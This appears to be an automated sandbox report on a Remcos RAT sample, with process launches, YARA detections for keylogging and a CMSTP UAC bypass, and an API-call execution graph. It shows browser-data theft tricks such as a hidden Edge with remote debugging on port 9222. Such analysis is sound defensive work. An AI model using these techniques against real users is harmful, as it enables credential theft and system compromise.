                                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:41496241AE1AD7C561D749F7D479CAFF
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                                                                                            Start time:02:39:03
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:41496241AE1AD7C561D749F7D479CAFF
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                                                                                            Start time:02:39:03
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:41496241AE1AD7C561D749F7D479CAFF
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                                                                                            Start time:02:39:08
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                                                                                            Start time:02:39:13
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                                                                                            Start time:02:39:14
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                                                                                            Start time:02:39:14
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                                                                                            Start time:02:39:15
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                                                                            Start time:02:39:22
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                                                                            Start time:02:39:22
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                                                                                            Start time:02:39:23
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                                                                                            Start time:02:39:23
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                                              Execution Coverage:6%
                                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:62.4%
                                                                                                                                                                                                                                                                                                                              Signature Coverage:16.3%
                                                                                                                                                                                                                                                                                                                              Total number of Nodes:1371
                                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:87
                                                                                                                                                                                                                                                                                                                              execution_graph 70373 41d4e0 70375 41d4f6 ctype ___scrt_fastfail 70373->70375 70374 41d6f3 70379 41d744 70374->70379 70389 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 70374->70389 70375->70374 70377 431fa9 21 API calls 70375->70377 70382 41d6a6 ___scrt_fastfail 70377->70382 70378 41d704 70378->70379 70380 41d770 70378->70380 70390 431fa9 70378->70390 70380->70379 70398 41d484 21 API calls ___scrt_fastfail 70380->70398 70382->70379 70383 431fa9 21 API calls 70382->70383 70387 41d6ce ___scrt_fastfail 70383->70387 70385 41d73d ___scrt_fastfail 70385->70379 70395 43265f 70385->70395 70387->70379 70388 431fa9 21 API calls 70387->70388 70388->70374 70389->70378 70391 431fb3 70390->70391 70392 431fb7 70390->70392 70391->70385 70393 43a89c ___std_exception_copy 21 API calls 70392->70393 70394 431fbc 70393->70394 70394->70385 70399 43257f 70395->70399 70397 432667 70397->70380 70398->70379 70400 432598 70399->70400 70404 43258e 70399->70404 70401 431fa9 21 API calls 70400->70401 70400->70404 70402 4325b9 70401->70402 70402->70404 70405 43294a CryptAcquireContextA 70402->70405 70404->70397 70406 43296b CryptGenRandom 70405->70406 70408 432966 70405->70408 70407 432980 CryptReleaseContext 70406->70407 70406->70408 70407->70408 70408->70404 67458 426040 67463 426107 recv 67458->67463 67464 10001f42 67510 10004330 67464->67510 67466 10001f51 CreateDirectoryW 67525 10004d80 67466->67525 67469 10004d80 28 API calls 67470 10001f91 CopyFileW 67469->67470 67472 10001fc0 67470->67472 67473 10001fb6 67470->67473 67475 10001ff0 67472->67475 67476 10004160 28 API calls 67472->67476 67582 10004160 67473->67582 67531 10003a70 67475->67531 67476->67475 67478 10002023 67548 100067d0 67478->67548 67480 100024f0 67598 100038d0 28 API calls 67480->67598 67482 1000250b 67483 10002523 67482->67483 67485 10004160 28 API calls 67482->67485 67486 10002552 67483->67486 67487 10004160 28 API calls 67483->67487 67484 10002590 67600 1000a5c6 28 API calls 2 library calls 67484->67600 67485->67483 67488 10002578 67486->67488 67490 10004160 28 API calls 67486->67490 67487->67486 67490->67488 67491 1000259a 67492 10004d80 28 API calls 67497 1000202b 67492->67497 67493 10004e80 28 API calls 67493->67497 67494 100021d5 CreateDirectoryW CreateDirectoryW 67496 10004330 28 API calls 67494->67496 67495 10004160 28 API calls 67495->67494 67496->67497 67497->67480 67497->67484 67497->67492 67497->67493 67497->67494 67497->67495 67498 10004cc0 28 API calls 67497->67498 67499 100022bc CopyFileW 67497->67499 67500 10002365 CopyFileW 67497->67500 67502 10004160 28 API calls 67497->67502 67504 10004160 28 API calls 67497->67504 67498->67497 67499->67497 67500->67497 67501 10002392 67500->67501 67597 10006e60 41 API calls 67501->67597 67502->67500 67504->67497 67505 100023ae CreateFileW 67506 100023ea WriteFile CloseHandle 67505->67506 67507 10002405 67505->67507 67506->67507 67507->67497 67508 1000258b 67507->67508 67599 1000daab 26 API calls __cftof 67508->67599 67511 10004386 67510->67511 67517 1000433e 67510->67517 67512 10004398 67511->67512 67513 1000443f 67511->67513 67515 100043b0 67512->67515 67516 10004449 67512->67516 67522 100043be 67512->67522 67627 1000a5a6 28 API calls 2 library calls 67513->67627 67515->67522 67614 100046f0 67515->67614 67628 1000a5a6 28 API calls 2 library calls 67516->67628 67517->67511 67521 10004365 67517->67521 67601 10004890 67521->67601 67522->67466 67524 10004380 67524->67466 67526 10004dd1 67525->67526 67526->67526 67527 10004890 28 API calls 67526->67527 67528 10004e45 67527->67528 67529 10004330 28 API calls 67528->67529 67530 10001f78 67529->67530 67530->67469 67532 10003a89 67531->67532 67533 10003b6c 67531->67533 67534 10003a97 67532->67534 67535 10003aca 67532->67535 67654 1000a5c6 28 API calls 2 library calls 67533->67654 67537 10003b76 67534->67537 67538 10003aa3 67534->67538 67539 10003b80 67535->67539 67540 10003ad6 67535->67540 67655 1000a5c6 28 API calls 2 library calls 67537->67655 67653 10004280 28 API calls ___BuildCatchObject 67538->67653 67656 1000a5a6 28 API calls 2 library calls 67539->67656 67544 100046f0 28 API calls 67540->67544 67547 10003ae6 67540->67547 67544->67547 67546 10003ac1 67546->67478 67547->67478 67549 10004d80 28 API calls 67548->67549 67550 1000682c PathFileExistsW 67549->67550 67551 10006897 67550->67551 67552 1000684b 67550->67552 67553 10004d80 28 API calls 67551->67553 67665 10003970 67552->67665 67555 100068a7 67553->67555 67557 100068c5 67555->67557 67560 10004160 28 API calls 67555->67560 67556 1000686e 67677 10006b40 28 API calls 67556->67677 67559 100068f8 PathFileExistsW 67557->67559 67561 10004160 28 API calls 67557->67561 67562 1000690a 67559->67562 67580 1000693c 67559->67580 67560->67557 67561->67559 67678 100034a0 67562->67678 67564 10006917 67685 10006b40 28 API calls 67564->67685 67565 10004160 28 API calls 67565->67580 67567 10004d80 28 API calls 67567->67580 67568 1000687d 67568->67565 67568->67580 67570 10006a0d PathFileExistsW 67570->67580 67571 10004160 28 API calls 67571->67570 67572 10006af3 67574 10006b05 67572->67574 67576 10004160 28 API calls 67572->67576 67573 10007d50 28 API calls 67573->67580 67577 10006b2b 67574->67577 67578 10004160 28 API calls 67574->67578 67576->67574 67577->67497 67578->67577 67579 10006bc0 28 API calls 67579->67580 67580->67567 67580->67570 67580->67571 67580->67572 67580->67573 67580->67579 67581 10004160 28 API calls 67580->67581 67657 10006d90 67580->67657 67686 10004a00 28 API calls ___BuildCatchObject 67580->67686 67581->67580 67583 100041a0 67582->67583 67586 10004170 67582->67586 67689 1000daab 26 API calls __cftof 67583->67689 67586->67472 67597->67505 67598->67482 67600->67491 67602 10004979 67601->67602 67603 100048a9 67601->67603 67629 1000a5c6 28 API calls 2 library calls 67602->67629 67604 10004983 67603->67604 67605 100048c5 67603->67605 67630 1000a5a6 28 API calls 2 library calls 67604->67630 67608 1000498d 67605->67608 67609 100048dc 67605->67609 67613 100048ea 67605->67613 67631 1000a5a6 28 API calls 2 library calls 67608->67631 67612 100046f0 28 API calls 67609->67612 67609->67613 67612->67613 67613->67524 67615 10004726 67614->67615 67616 1000476f 67615->67616 67625 1000475f 67615->67625 67639 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67615->67639 67618 10004798 67616->67618 67619 10004778 67616->67619 67632 1000a5f3 67618->67632 67620 10004784 67619->67620 67640 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67619->67640 67624 1000a5f3 new 22 API calls 67620->67624 67623 10004160 28 API calls 67626 10004800 67623->67626 67624->67625 67625->67623 67625->67626 67626->67522 67629->67604 67636 1000a5f8 67632->67636 67634 1000a624 67634->67625 67636->67634 67641 1000dafb 67636->67641 67648 10014867 7 API calls 2 library calls 67636->67648 67649 1000ae00 RaiseException __CxxThrowException@8 new 67636->67649 67650 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67636->67650 67646 10015a9f IsInExceptionSpec 67641->67646 67642 10015add 67652 100160ec 20 API calls __dosmaperr 67642->67652 67644 10015ac8 RtlAllocateHeap 67645 10015adb 67644->67645 67644->67646 67645->67636 67646->67642 67646->67644 67651 10014867 7 API calls 2 library calls 67646->67651 67648->67636 67651->67646 67652->67645 67653->67546 67654->67537 67655->67539 67658 10006db1 67657->67658 67659 10006dd6 67657->67659 67658->67659 67660 10006dbc 67658->67660 67661 10004890 28 API calls 67659->67661 67687 10005a30 28 API calls 2 library calls 67660->67687 67663 10006de2 67661->67663 67663->67580 67664 10006dc7 67664->67580 67666 100039c6 67665->67666 67667 1000397e 67665->67667 67668 100039d6 67666->67668 67669 10003a5e 67666->67669 67667->67666 67674 100039a5 67667->67674 67671 100046f0 28 API calls 67668->67671 67673 100039e6 67668->67673 67688 1000a5a6 28 API calls 2 library calls 67669->67688 67671->67673 67673->67556 67675 10003a70 28 API calls 67674->67675 67676 100039c0 67675->67676 67676->67556 67677->67568 67679 100034c1 67678->67679 67681 100034d3 67678->67681 67680 10003970 28 API calls 67679->67680 67682 100034cc 67680->67682 67683 10003970 28 API calls 67681->67683 67682->67564 67684 100034f9 67683->67684 67684->67564 67685->67568 67686->67580 67687->67664 67690 10002f82 67691 10002f8d 67690->67691 67695 10002fb9 67690->67695 67692 10002f97 67691->67692 67772 1000daab 26 API calls __cftof 67691->67772 67694 10002fa3 67692->67694 67773 1000daab 26 API calls __cftof 67692->67773 67697 10002faf 67694->67697 67774 1000daab 26 API calls __cftof 67694->67774 67699 10002ff7 67695->67699 67703 10003019 67695->67703 67776 1000daab 26 API calls __cftof 67695->67776 67697->67695 67775 1000daab 26 API calls __cftof 67697->67775 67705 10003003 67699->67705 67777 1000daab 26 API calls __cftof 67699->67777 67700 100030df 67717 1000315a 67700->67717 67724 10003138 67700->67724 67788 1000daab 26 API calls __cftof 67700->67788 67704 10003057 67703->67704 67708 10003079 67703->67708 67780 1000daab 26 API calls __cftof 67703->67780 67714 10003063 67704->67714 67781 1000daab 26 API calls __cftof 67704->67781 67716 1000300f 67705->67716 67778 1000daab 26 API calls __cftof 67705->67778 67708->67700 67711 100030bd 67708->67711 67784 1000daab 26 API calls __cftof 67708->67784 67712 100030c9 67711->67712 67785 1000daab 26 API calls __cftof 67711->67785 67721 100030d5 67712->67721 67786 1000daab 26 API calls __cftof 67712->67786 67715 1000306f 67714->67715 67782 1000daab 26 API calls __cftof 67714->67782 67715->67708 67783 1000daab 26 API calls __cftof 67715->67783 67716->67703 67779 1000daab 26 API calls __cftof 67716->67779 67718 1000317b 67717->67718 67736 100031c0 67717->67736 67792 10003dc0 67718->67792 67721->67700 67787 1000daab 26 API calls __cftof 67721->67787 67728 10003144 67724->67728 67789 1000daab 26 API calls __cftof 67724->67789 67731 10003150 67728->67731 67790 1000daab 26 API calls __cftof 67728->67790 67731->67717 67791 1000daab 26 API calls __cftof 67731->67791 67732 100031a2 67808 100036c0 67732->67808 67738 10003220 67736->67738 67744 100086b0 67736->67744 67737 100031ad 67739 100036c0 26 API calls 67738->67739 67740 10003241 67739->67740 67741 100036c0 26 API calls 67740->67741 67742 10003258 67741->67742 67745 100086c2 67744->67745 67746 1000870b 67744->67746 67747 10008911 67745->67747 67748 100086cd select 67745->67748 67749 10008774 select 67746->67749 67752 100087a0 67746->67752 67747->67736 67748->67736 67749->67752 67751 100087b5 recv 67751->67752 67753 100087d2 WSAGetLastError 67751->67753 67756 1000880b 67752->67756 67759 100097d0 28 API calls 67752->67759 67819 100097d0 67752->67819 67754 10008800 67753->67754 67755 100087df WSAGetLastError 67753->67755 67757 100097d0 28 API calls 67754->67757 67755->67752 67755->67754 67758 100097d0 28 API calls 67756->67758 67770 10008809 ___BuildCatchObject 67757->67770 67760 10008811 closesocket 67758->67760 67759->67752 67761 10008828 67760->67761 67823 1000fc8d 65 API calls 2 library calls 67761->67823 67762 100088bf 67762->67747 67765 10008901 closesocket 67762->67765 67764 10008850 send 67766 1000886b WSAGetLastError 67764->67766 67764->67770 67765->67747 67766->67762 67768 1000887a WSAGetLastError 67766->67768 67767 100088c1 closesocket 67769 100088d8 67767->67769 67768->67762 67768->67770 67824 1000fc8d 65 API calls 2 library calls 67769->67824 67770->67762 67770->67764 67770->67767 67793 10003e25 67792->67793 67798 10003dce 67792->67798 67794 10003eab 67793->67794 67795 10003e2e 67793->67795 67845 1000a5a6 28 API calls 2 library calls 67794->67845 67800 10003e3e 67795->67800 67828 10004460 67795->67828 67798->67793 67801 10003df4 67798->67801 67800->67732 67802 10003df9 67801->67802 67803 10003e0f 67801->67803 67826 10003ec0 28 API calls std::_Xinvalid_argument 67802->67826 67827 10003ec0 28 API calls std::_Xinvalid_argument 67803->67827 67806 10003e09 67806->67732 67807 10003e1f 67807->67732 67809 100036cb 67808->67809 67810 100036ed 67808->67810 67809->67810 67811 100036da 67809->67811 67851 1000daab 26 API calls __cftof 67809->67851 67810->67737 67813 100036e1 67811->67813 67852 1000daab 26 API calls __cftof 67811->67852 67815 100036e8 67813->67815 67853 1000daab 26 API calls __cftof 67813->67853 67815->67810 67854 1000daab 26 